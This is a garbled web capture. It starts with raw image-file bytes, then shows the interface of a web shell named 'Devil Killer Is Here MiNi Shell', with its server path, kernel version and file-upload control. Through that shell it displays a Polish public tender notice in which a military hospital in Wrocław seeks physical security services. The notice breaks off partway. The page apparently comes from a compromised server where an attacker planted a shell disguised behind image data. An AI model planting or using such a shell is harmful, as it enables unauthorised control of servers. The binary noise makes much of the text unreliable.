JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20231207/0053763601-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa ochrony fizycznej RBZMed </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">4. Wojskowy Szpital Kliniczny z Polikliniką Samodzielny Publiczny Zakład Opieki Zdrowotnej we Wrocławiu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 930090240</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Weigla 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wrocław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">50-981</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL514 - Miasto Wrocław</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zam.pub@4wsk.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.4wsk.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa ochrony fizycznej RBZMed </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9745b1e4-94e6-11ee-ba3b-4e891c384685</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00537636</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-12-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00034164/75/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Ochrona obiektów i mienia RBZMed</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/4wsk/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Zamawiający informuje, że<br/>instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania<br/>wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w<br/>niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują się w zakładce „Instrukcje dla<br/>wykonawców&#34; 2. Korzystanie z Platformy zakupowej przez wykonawców jest bezpłatne.Szczegółowe<br/>informacje zawiera rozdział XIII SWZ.3. W postępowaniu o udzielenie zamówienia komunikacja między<br/>zamawiającym a wykonawcami odbywa się za pomocą środka komunikacji elektronicznej - platformy<br/>zakupowej „openNexus” https://platformazakupowa.pl/pn/4wsk/proceedings/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne<br/>wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie Platformy zakupowej. Zamawiający, określa niezbędne wymagania<br/>sprzętowo – aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:- stały dostęp do sieci<br/>Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,- komputer klasy PC lub MAC o<br/>następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,-<br/>zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10<br/>0.,- włączona obsługa JavaScript,- zainstalowany program Adobe Acrobat Reader lub inny obsługujący<br/>format plików .pdf,- Szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3. -<br/>Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas<br/>(hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego<br/>Urzędu Miar Ogłoszenie nr 2021/BZP 00041662/01 z dnia 2021-04-27 2021</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający informujemy, że:1) administratorem Pani/Pana<br/>danych osobowych jest 4. Wojskowy Szpital Kliniczny z Polikliniką we Wrocławiu2) administrator<br/>wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mail:<br/>abi@4wsk.pl3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w<br/>celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego,<br/>prowadzonym w trybie przetargu nieograniczonego.4) odbiorcami Pani/Pana danych osobowych będą<br/>osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74<br/>PZP.5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 PZP. przez okres 4 lat<br/>od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata, okres przechowywania obejmuje cały czas trwania umowy;6) obowiązek podania przez<br/>Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach p.z.p., związanym z udziałem w postępowaniu o udzielenie zamówienia<br/>publicznego.7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w<br/>sposób zautomatyzowany, stosownie do art. 22 RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający informujemy, że:8) posiada Pani/Pan: na<br/>podstawie art. 15 RODO a) prawo dostępu do danych osobowych Pani/Pana dotyczących (w<br/>przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie<br/>dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających<br/>na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie<br/>zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego<br/>postępowania o udzielenie zamówienia);b) na podstawie art. 16 RODO prawo do sprostowania<br/>Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą<br/>wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w<br/>zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego załączników);c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia<br/>przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie<br/>zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo<br/>do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego);d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy<br/>uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia<br/>danych osobowych;b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;c)<br/>na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO; 10)<br/>przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO<br/>przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla<br/>przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">4WSzKzP.SZP.2612.139.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Świadczenie usług ochrony fizycznej Rejonowej Bazy Zaopatrzenia Medycznego </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">75220000-4 - Usługi w zakresie obrony</p> <p class="mb-0">92522000-6 - Usługi ochrony obiektów i budynków historycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas przyjazdu grupy Interwencyjnej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wysokość kary umownej za każdą godzinę braku pracownika ochrony na posterunku</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Ilość osób bezrobotnych zatrudnionych do realizacji przedmiotowego zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia określonego w niniejszej SWZ mogą ubiegać się wykonawcy, którzy<br/>spełniają następujące warunki udziału w postępowaniu określone przez zamawiającego,<br/>dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym – Zamawiający nie stawia warunku<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów - Posiadają uprawnienia<br/>do wykonywania przedmiotu zamówienia. Za spełnienie tego wymogu Zamawiający uzna<br/>posiadanie aktualnych: koncesji MSWiA na prowadzenie działalności gospodarczej w zakresie<br/>ochrony osób i mienia zgodnie z ustawą z dnia 22 sierpnia 1997r. o ochronie osób i mienia (tj.<br/>Dz. U. z 2020 r. poz. 838, z 2021 r. poz. 469).<br/>3) sytuacji ekonomicznej lub finansowej - Posiadanie polisy OC w związku z prowadzoną<br/>działalnością gospodarczą w zakresie usług ochrony osób i mienia (suma gwarancyjna co<br/>najmniej jak w § 4.1 Rozporządzenia Ministra Finansów z dnia 9 grudnia 2013 r. w sprawie<br/>obowiązkowego ubezpieczenia odpowiedzialności cywilnej przedsiębiorcy wykonującego<br/>działalność gospodarczą w zakresie usług ochrony osób i mienia (Dz.U. z dnia 16 grudnia 2013<br/>r. poz.1550):.<br/>§ 4.<br/>1.<br/>Minimalna suma gwarancyjna ubezpieczenia OC w odniesieniu do jednego zdarzenia i do<br/>wszystkich zdarzeń, których skutki są objęte umową ubezpieczenia OC, jest zależna od<br/>osiągniętego w roku obrotowym poprzedzającym rok zawarcia umowy ubezpieczenia OC<br/>rocznego obrotu netto przedsiębiorcy wykonującego działalność gospodarczą w zakresie usług<br/>ochrony osób i mienia, i wynosi równowartość w złotych:<br/>1)<br/>20.000 euro - jeżeli roczny obrót netto z tytułu wykonywanej działalności gospodarczej nie<br/>przekroczył równowartości w złotych 2.000.000 euro;<br/>2)<br/>25.000 euro - jeżeli roczny obrót netto z tytułu wykonywanej działalności gospodarczej<br/>przekroczył równowartość w złotych 2.000.000 euro i nie przekroczył równowartości w złotych<br/>10.000.000 euro;<br/>3)<br/>40.000 euro - jeżeli roczny obrót netto z tytułu wykonywanej działalności gospodarczej<br/>przekroczył równowartość w złotych 10.000.000 euro i nie przekroczył równowartości w złotych<br/>50.000.000 euro;<br/>4)<br/>50.000 euro - jeżeli roczny obrót netto z tytułu wykonywanej działalności gospodarczej przekroczył równowartość w złotych 50.000.000 euro.<br/>4) zdolności technicznej lub zawodowej –<br/>a) Wykonawca musi dysponować co najmniej 15 pracownikami, posiadającymi aktualne<br/>zaświadczenie potwierdzające wpisanie na listę kwalifikowanych pracowników ochrony fizycznej<br/>oraz posiadającymi pozwolenie na broń palną<br/>b) Za spełnienie wymogu Zamawiający uzna wykonanie przez Wykonawcę w okresie ostatnich<br/>trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie - min. dwie usługi ochrony osób i mienia (należy wykazać udział co<br/>najmniej 15 pracowników ochrony, w ramach jednej usługi) zgodnie z Rozporządzeniem Ministra<br/>Spraw Wewnętrznych i Administracji z dnia 21 października 2011 r. w sprawie zasad uzbrojenia<br/>specjalistycznych uzbrojonych formacji ochronnych i warunków przechowywania oraz<br/>ewidencjonowania broni i amunicji (tekst jednolity Dz.U. z 2015. poz. 992) Ustawa z dnia 21<br/>maja 1999r. o broni i amunicji (tekst jednolity Dz. U. z 2020 r. poz. 955) Ustawa z dnia 24.maja<br/>2013 o środkach przymusu bezpośredniego i broni palnej (Dz.U. 2019 r. poz.2418). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający przewiduje<br/>wykluczenie wykonawcy na podstawie art. 109 ust. 1 pkt 4) PZP, tzn. z<br/>postępowania o udzielenie zamówienia wyklucza się wykonawcę w stosunku do którego otwarto<br/>likwidację, ogłoszono upadłość, którego aktywami zarządza likwidator lub sąd, zawarł układ z<br/>wierzycielami, którego działalność gospodarcza jest zawieszona albo znajduje się on w innej tego<br/>rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej<br/>procedury</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Pozostałe podmiotowe środki dowodowe:<br/>Zamawiający żąda podmiotowych środków dowodowych:<br/>a) Kopia koncesji MSWiA na prowadzenie działalności gospodarczej w zakresie ochrony osób i mienia,<br/>wydaną na podstawie ustawy z dnia 22 sierpnia 1997r. o ochronie osób i mienia (Dz.U. 2020. poz.<br/>838, z 2021 r. poz.469 )<br/>b) Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia – załącznik nr 3<br/>c) Polisa OC w związku z prowadzoną działalnością gospodarczą w zakresie usług ochrony osób i<br/>mienia (suma gwarancyjna co najmniej jak w § 4.1 Rozporządzenia). zgodnie z Rozporządzeniem<br/>Ministra Finansów z dnia 9 grudnia 2013r. w sprawie obowiązkowego ubezpieczenia<br/>odpowiedzialności cywilnej przedsiębiorcy wykonującego działalność gospodarczą w zakresie usług<br/>ochrony osób i mienia<br/>d) wykaz usług, potwierdzający warunek opisany w Rozdz. VIII pkt 4 ppkt b), Za spełnienie wymogu<br/>Zamawiający uzna wykonanie przez Wykonawcę w okresie ostatnich trzech lat przed upływem terminu<br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie - min. dwie usługi<br/>ochrony osób i mienia (należy wykazać udział co najmniej 15 pracowników ochrony, w ramach jednej<br/>usługi) zgodnie z Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 21<br/>października 2011 r. w sprawie zasad uzbrojenia specjalistycznych uzbrojonych formacji ochronnych i<br/>warunków przechowywania oraz ewidencjonowania broni i amunicji (tekst jednolity Dz.U. z 2015. poz.<br/>992) Ustawa z dnia 21 maja 1999r. o broni i amunicji (tekst jednolity Dz. U. z 2020 r. poz. 955) Ustawa<br/>z dnia 24.maja 2013 o środkach przymusu bezpośredniego i broni palnej (Dz.U. 2019 r. poz.2418). –<br/>załącznik nr 5<br/>Podmiotowe środki dowodowe należy złożyć na Platformie zakupowej w terminie wyznaczonym przez<br/>zamawiającego, nie krótszym niż 5 dni od daty wezwania (dotyczy wykonawcy, którego ofertę najwyżej<br/>oceniono). Podmiotowe środki dowodowe należy sporządzić w formie elektronicznej:<br/>a) w oryginale – Wykonawca składa dokument w postaci elektronicznej opatrzony kwalifikowanym<br/>podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym,<br/>b) jako cyfrowe odwzorowanie dokumentu sporządzonego w oryginale w postaci papierowej i<br/>opatrzonego własnoręcznym podpisem – Wykonawca składa dokument w postaci elektronicznej<br/>opatrzony kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym<br/>poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie przedmiotowego zamówienia.<br/>W takim przypadku wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu<br/>i zawarcia umowy w sprawie zamówienia publicznego zgodnie z art. 58 ust. 2 ustawy PZP:<br/>1) Pełnomocnikiem może być jeden z wykonawców działających wspólnie lub osoba trzecia (np.<br/>pracownik jednego z wykonawców);<br/>2) Jeżeli pełnomocnikiem pozostałych wykonawców jest wykonawca będący osobą prawną to<br/>może on działać zgodnie z ujawnionymi w dokumentach rejestrowych zasadami reprezentacji.<br/>2. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenie<br/>o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu składa każdy z<br/>wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje<br/>spełnianie warunków udziału w postępowaniu.<br/>3. W przypadku wykonawców ubiegających się 